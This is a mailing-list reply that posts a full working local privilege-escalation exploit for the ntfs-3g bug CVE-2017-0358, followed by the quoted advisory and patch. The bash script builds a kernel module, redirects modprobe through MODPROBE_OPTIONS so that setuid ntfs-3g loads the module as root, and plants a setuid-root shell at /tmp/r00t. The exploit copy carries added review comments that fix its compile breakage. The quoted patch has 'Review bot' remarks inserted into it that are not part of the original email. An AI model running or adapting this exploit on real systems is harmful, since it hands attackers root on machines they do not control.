Date: Fri, 3 Feb 2017 23:14:16 -0800
From: Kristian Erik Hermansen <kristian.hermansen@...il.com>
To: oss-security@...ts.openwall.com
Subject: Re: CVE-2017-0358 ntfs-3g: modprobe influence
 vulnerability via environment variables

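#!/bin/bash
# PoC for CVE-2017-0358: ntfs-3g, installed setuid root on several
# distributions, forks /sbin/modprobe without scrubbing its environment,
# so MODPROBE_OPTIONS can point modprobe at a module tree we control.
# Plan: build a kernel module that drops a setuid-root shell, lay out a
# fake /lib/modules tree under the current directory, then let ntfs-3g
# load it as "fuse".
# WARNING: this loads an untrusted kernel module and leaves a setuid-root
# /tmp/r00t behind; run it only on a disposable test system.
echo "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
# NOTE(review): the banner says CVE-2017-0359 while the mail subject, the
# module source and the attachment name all say CVE-2017-0358; the banner
# text is kept exactly as posted.
echo "@  CVE-2017-0359, PoC by Kristian Erik Hermansen  @"
echo "@  ntfs-3g local privilege escalation to root     @"
echo "@  Credits to Google Project Zero                 @"
echo "@  Affects: Debian 9/8/7, Ubuntu, Gentoo, others  @"
echo "@  Tested: Debian 9 (Stretch)                     @"
echo "@  Date: 2017-02-03                               @"
echo "@  Link: https://goo.gl/A9I8Vq                    @"
echo "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
echo "[*] Gathering environment info ..."
cwd="$(pwd)"
un="$(uname -r)"
# With "modprobe -d ${cwd}", modprobe presumably looks for
# ${cwd}/lib/modules/${un}/modules.dep.bin and resolves fuse.ko from the
# path recorded there (kernel/fs/fuse/fuse.ko) relative to that directory;
# both directories are created here and redirected below.
dlm="${cwd}/lib/modules"
dkf="${cwd}/kernel/fs"
echo "[*] Creating kernel hijack directories ..."
mkdir -p "${dlm}" "${dkf}"
echo "[*] Forging symlinks ..."
# Both directory-level links point back at ${cwd}, so every lookup lands
# here. -n keeps a re-run from following an already existing
# link-to-directory and creating a second link inside ${cwd} instead of
# replacing the first one.
ln -sfn "${cwd}" "${dlm}/${un}"
ln -sfn "${cwd}" "${dkf}/fuse"
# What modprobe finally opens as fuse.ko is our own module.
ln -sf cve_2017_0358.ko fuse.ko
echo "[*] Pulling in deps ... "
echo "[*] Building kernel module ... "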

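# Module source. Its init routine runs in the kernel, as root, once
# modprobe has been tricked into loading this file in place of fuse.ko.
cat << 'EOF' > cve_2017_0358.c
#include <linux/module.h>

/* NOTE(review): "CC" is probably not one of the licence strings the kernel
 * recognises, so loading this module will taint the kernel; harmless for
 * a PoC but it shows up in dmesg. */
MODULE_LICENSE("CC");
/* Mail wrapping split this string literal across two lines in the posted
 * copy; it has to be a single-line literal to compile. */
MODULE_AUTHOR("kristian erik hermansen <kristian.hermansen+CVE-2017-0358@...il.com>");
MODULE_DESCRIPTION("PoC for CVE-2017-0358 from Google Project Zero");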
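/*
 * Module entry point, run by the kernel right after the module is loaded
 * (here: when modprobe, misdirected by MODPROBE_OPTIONS, loads this file
 * as "fuse"). It spawns two root user-mode helpers: one that creates a
 * setuid copy of /bin/sh at /tmp/r00t and one that asks rmmod to unload
 * this module again. Always returns 0 so the load is reported as
 * successful.
 */
int init_module(void) {
  /* Minimal environment for the helpers; every path used below is
   * absolute, so no PATH is needed. Declarations come first to avoid
   * the kernel's -Wdeclaration-after-statement warning. */
  char *envp[] = { "HOME=/tmp", NULL };
  char *argv[] = { "/bin/sh", "-c", "/bin/cp /bin/sh /tmp/r00t; /bin/chmod u+s /tmp/r00t", NULL };
  char *argvv[] = { "/bin/sh", "-c", "/sbin/rmmod cve_2017_0358", NULL };
  int rc;

  /* The posted copy had this message and the argv string above split by
   * mail wrapping; both must be single-line literals to compile. */
  printk(KERN_INFO "[!] Exploited CVE-2017-0358 successfully; may want to patch your system!\n");

  /* UMH_WAIT_EXEC returns once the helper has exec'd, not once it has
   * finished, so /tmp/r00t may not exist yet when init_module returns;
   * the calling script checks for it only after ntfs-3g exits, which in
   * practice leaves enough time. Report a failed spawn instead of
   * silently dropping the return code. */
  rc = call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
  if (rc)
    printk(KERN_INFO "[-] CVE-2017-0358: spawning setuid-shell helper failed (%d)\n", rc);

  /* Use the second helper's own argv[0]; the original passed argv[0],
   * which happened to be the same string. NOTE(review): rmmod issued
   * while init_module is still running may well be refused as busy, so
   * the unload is best-effort either way. */
  rc = call_usermodehelper(argvv[0], argvv, envp, UMH_WAIT_EXEC);
  if (rc)
    printk(KERN_INFO "[-] CVE-2017-0358: spawning rmmod helper failed (%d)\n", rc);
  return 0;
}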

/*
 * Module exit routine, run when the module is unloaded (e.g. by the
 * rmmod helper started from init_module). Only logs the unload.
 */
void cleanup_module(void) {
  static const char unload_msg[] = "[*] CVE-2017-0358 exploit unloading ...\n";

  printk(KERN_INFO "%s", unload_msg);
}
EOF

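# Out-of-tree kernel module Makefile. Recipe lines MUST start with a TAB;
# the posted copy lost them to mail formatting, which makes GNU make stop
# with "missing separator". The heredoc delimiter is quoted, so $(...)
# reaches make verbatim. $(MAKE) rather than bare make propagates flags
# and the jobserver to the sub-make; $(CURDIR) is make's own notion of
# the working directory and does not depend on the PWD variable.
cat << 'EOF' > Makefile
obj-m += cve_2017_0358.o

all:
	$(MAKE) -C /lib/modules/$(shell uname -r)/build M=$(CURDIR) modules

clean:
	$(MAKE) -C /lib/modules/$(shell uname -r)/build M=$(CURDIR) clean
EOF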

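# Build the module. Without a toolchain and headers matching the running
# kernel nothing below can work, so stop here instead of falling through
# to the exploit attempt (the posted script only echoed and carried on).
if ! make >/dev/null 2>&1; then
  echo "[-] FAILED: you need make / build tools (and matching kernel headers)"
  exit 1
fi
# modprobe -d "${cwd}" reads "${cwd}/lib/modules/${un}/modules.dep.bin";
# reuse the real dependency index so "fuse" still resolves to
# kernel/fs/fuse/fuse.ko, which the symlinks above redirect to our module.
if ! cp "/lib/modules/${un}/modules.dep.bin" .; then
  echo "[-] FAILED: linux-image location non-default?"
  exit 1
fi
# The trigger. The setuid ntfs-3g forks /sbin/modprobe fuse as root with
# our environment intact, so MODPROBE_OPTIONS redirects the module search
# path to "${cwd}" and our module is loaded. The mount of /dev/null is
# expected to fail; its output is noise. (The posted copy had the
# redirections wrapped onto their own line, which detached them from the
# command.)
MODPROBE_OPTIONS="-v -d ${cwd}" ntfs-3g /dev/null /dev/null >/dev/null 2>&1
# Only hand out the shell if the helper actually produced a setuid root
# binary; running a non-existent /tmp/r00t would just print an error.
if [ -u /tmp/r00t ] && /tmp/r00t -c 'whoami' | grep -qx 'root'; then
  echo "[+] SUCCESS: You have root. Don't be evil :)"
  /tmp/r00t
else
  echo "[-] FAILED: /tmp/r00t was not created or is not setuid root"
  exit 1
fi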

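# Sample session from the author. The transcript is documentation only:
# it is fed to the no-op ':' and never printed. The posted copy fed it to
# 'echo', which ignores its stdin and emitted a stray blank line after the
# root shell exited. Note the banner here reads CVE-2017-0359 while the
# rest of the PoC refers to CVE-2017-0358.
: << 'EOF'
$ whoami
user
$ ./cve-2017-0358.sh
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@  CVE-2017-0359, PoC by Kristian Erik Hermansen  @
@  ntfs-3g local privilege escalation to root     @
@  Credits to Google Project Zero                 @
@  Affects: Debian 9/8/7, Ubuntu, Gentoo, others  @
@  Tested: Debian 9 (Stretch)                     @
@  Date: 2017-02-03                               @
@  Link: https://goo.gl/A9I8Vq                    @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
[*] Gathering environment info ...
[*] Creating kernel hijack directories ...
[*] Forging symlinks ...
[*] Pulling in deps ...
[*] Building kernel module ...
[+] SUCCESS: You have root. Don't be evil :)
# whoami
root
EOF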


On Tue, Jan 31, 2017 at 10:44 PM, Laszlo Boszormenyi (GCS)
<gcs@...ian.org> wrote:
> Hi,
>
> Jann Horn, Project Zero (Google) discovered that ntfs-3g, a read-write
> NTFS driver for FUSE, does not scrub the environment before
> executing modprobe to load the fuse module. This lets the caller influence
> the behavior of modprobe (MODPROBE_OPTIONS environment variable, --config and
> --dirname options), potentially allowing local root privilege
> escalation if ntfs-3g is installed setuid root. This is the case for Debian,
> Ubuntu and probably Gentoo.
>
> This problem is in the source since 2008, maybe before.
> The fix is easy, use execle instead of execl and pass NULL as
> environment variables.
> -- cut --
> --- ntfs-3g/src/lowntfs-3g.c.ref        2016-12-31 08:56:59.011749600 +0100
> +++ ntfs-3g/src/lowntfs-3g.c    2017-01-05 14:41:52.041473700 +0100
> @@ -4291,13 +4291,14 @@
>         struct stat st;
>         pid_t pid;
>         const char *cmd = "/sbin/modprobe";
> +       char *env = (char*)NULL;
>         struct timespec req = { 0, 100000000 };   /* 100 msec */
>         fuse_fstype fstype;
>
>         if (!stat(cmd, &st) && !geteuid()) {
>                 pid = fork();
>                 if (!pid) {
> -                       execl(cmd, cmd, "fuse", NULL);
> +                       execle(cmd, cmd, "fuse", NULL, &env);
>                         _exit(1);
>                 } else if (pid != -1)
>                         waitpid(pid, NULL, 0);
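Review bot: The added `execle` line terminates its variadic argument list with a bare `NULL` and passes the empty environment as `&env`, the address of a single `char *` — both work with glibc, but `NULL` may expand to a plain integer `0` on some implementations, which is wrong in a variadic call, and `&env` reads like a stray address-of rather than an envp array. A clearer, portable form is `char *const envp[] = { NULL };` followed by `execle(cmd, cmd, "fuse", (char *)NULL, envp);`, which also drops the redundant `(char*)NULL` cast on the added declaration. Scrubbing the whole environment rather than just unsetting MODPROBE_OPTIONS is the right approach here, since modprobe is invoked by absolute path and needs nothing from the setuid caller's environment. The enclosing function continues outside the hunk.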
> --- ntfs-3g/src/ntfs-3g.c.ref   2016-12-31 08:56:59.022518700 +0100
> +++ ntfs-3g/src/ntfs-3g.c       2017-01-05 15:45:45.912499400 +0100
> @@ -3885,13 +3885,14 @@
>         struct stat st;
>         pid_t pid;
>         const char *cmd = "/sbin/modprobe";
> +       char *env = (char*)NULL;
>         struct timespec req = { 0, 100000000 };   /* 100 msec */
>         fuse_fstype fstype;
>
>         if (!stat(cmd, &st) && !geteuid()) {
>                 pid = fork();
>                 if (!pid) {
> -                       execl(cmd, cmd, "fuse", NULL);
> +                       execle(cmd, cmd, "fuse", NULL, &env);
>                         _exit(1);
>                 } else if (pid != -1)
>                         waitpid(pid, NULL, 0);
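Review bot: This hunk is a line-for-line copy of the lowntfs-3g.c change above, which is how the unscrubbed `execl` came to exist in two drivers in the first place; moving the fork/exec of modprobe into one shared helper (e.g. `static void load_fuse_module(void)` in a common source file) would keep the environment-scrubbing fix from diverging between the two. The same remarks apply to the added lines: prefer `(char *)NULL` as the variadic terminator and an explicit `char *const envp[] = { NULL };` over `&env`. The enclosing function continues outside the hunk.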
> -- cut --
>
> CVE-2017-0358 is assigned to this issue by Salvatore Bonaccorso,
> Debian Security Team.
>
> Regards,
> Laszlo/GCS



-- 
Regards,

Kristian Erik Hermansen
https://www.linkedin.com/in/kristianhermansen
https://profiles.google.com/kristianerikhermansen

View attachment "cve-2017-0358.sh.txt" of type "text/plain" (15934 bytes)
